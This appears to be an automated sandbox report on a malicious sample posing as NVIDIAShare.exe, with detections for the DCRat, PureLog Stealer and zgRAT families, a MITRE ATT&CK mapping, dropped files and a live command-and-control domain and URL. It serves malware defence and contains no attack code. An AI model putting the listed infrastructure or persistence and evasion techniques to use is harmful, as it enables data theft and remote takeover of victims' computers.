Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NVIDIA Container.exe PID: 1472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hBoBqOIwjXsCbkOMEKwZ.exe PID: 2520, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: NVIDIAShare.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: NVIDIAShare.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NVIDIA Container.exe PID: 1472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hBoBqOIwjXsCbkOMEKwZ.exe PID: 2520, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: NVIDIAShare.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: NVIDIAShare.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 5.0.NVIDIA Container.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	57 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	3 Software Packing	NTDS	261 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
NVIDIAShare.exe.bin.exe	61%	ReversingLabs	Win32.Trojan.Uztuby
NVIDIAShare.exe.bin.exe	100%	Avira	VBS/Runner.VPG
NVIDIAShare.exe.bin.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\IyVKJmYP.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\DnVLkBOS.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\AOEnQqnj.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\DSPMVDWa.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\CTevJfQr.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\JOqdsLLu.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\JfykNhTG.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\JesvDTTS.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\DnVLkBOS.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\AOEnQqnj.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AAjFTaDk.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\AOEnQqnj.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AVNUZtIi.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\BlhnJSvN.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\CTevJfQr.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DSPMVDWa.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DaiMBcDs.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DnVLkBOS.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GwjbnDUU.log	25%	ReversingLabs
C:\Users\user\Desktop\HbFMikPW.log	25%	ReversingLabs
C:\Users\user\Desktop\IMSbQhuH.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IyVKJmYP.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JOqdsLLu.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JesvDTTS.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JfykNhTG.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LxmktYfY.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NBjcEgcI.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OOMCloya.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PszJebvu.log	25%	ReversingLabs
C:\Users\user\Desktop\ShoatPdx.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TAxSAtpp.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TMLKnwYz.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TxJtcnQc.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UCVIiXUm.log	25%	ReversingLabs
C:\Users\user\Desktop\VAeASPIF.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XOysNJXm.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XwgSVREI.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\chLhgIIs.log	25%	ReversingLabs
C:\Users\user\Desktop\cjQhkVuX.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\fjyPCrNn.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gzqzblNZ.log	25%	ReversingLabs
C:\Users\user\Desktop\hxRHxlcT.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oSRflUSV.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pAbpDGmk.log	25%	ReversingLabs
C:\Users\user\Desktop\qiYwETGO.log	25%	ReversingLabs
C:\Users\user\Desktop\skLfaCLK.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\snUoPbCy.log	25%	ReversingLabs
C:\Users\user\Desktop\ukwwlbRt.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\xYhnoKfH.log	25%	ReversingLabs
C:\Users\user\Desktop\zwfUdEOY.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://bibaprog.ru	0%	Avira URL Cloud	safe
http://bibaprog.ru/	0%	Avira URL Cloud	safe
http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bibaprog.ru	104.21.64.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://bibaprog.ru	hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.000000000302D000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000003115000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.000000000398E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000003121000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.000000000314B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://bibaprog.ru/	hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	NVIDIA Container.exe, 00000005.00000002.2111607409.00000000038E7000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	bibaprog.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590022
Start date and time:	2025-01-13 13:36:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	76
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NVIDIAShare.exe.bin.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@106/78@1/1
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 57% Number of executed functions: 329 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hBoBqOIwjXsCbkOMEKwZ.exe, PID 6512 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: NVIDIAShare.exe.bin.exe

Simulations

Behavior and APIs

Time	Type	Description
07:37:12	API Interceptor	9x Sleep call for process: hBoBqOIwjXsCbkOMEKwZ.exe modified
13:37:07	Task Scheduler	Run new task: hBoBqOIwjXsCbkOMEKwZ path: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
13:37:07	Task Scheduler	Run new task: hBoBqOIwjXsCbkOMEKwZh path: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	gem2.exe	Get hash	malicious	Unknown	Browse	securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	bridgenet.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.112.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.80.1
	recode.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.16.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.80.156
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AAjFTaDk.log	GameHackBuild1.exe.bin.exe	Get hash	malicious	DCRat, Orcus	Browse
	XenoSetup(2).exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SAMP_CHEAT_ATVECHAU2.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SPISOK_DENEG.exe	Get hash	malicious	DCRat	Browse
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	DCobxod.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	fatality.exe	Get hash	malicious	CryptOne, DCRat, Mofksys, PureLog Stealer, zgRAT	Browse
	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SearchIndexer.exe	Get hash	malicious	DCRat, Neshta, PureLog Stealer, zgRAT	Browse
	fatality.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NVIDIA Container.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
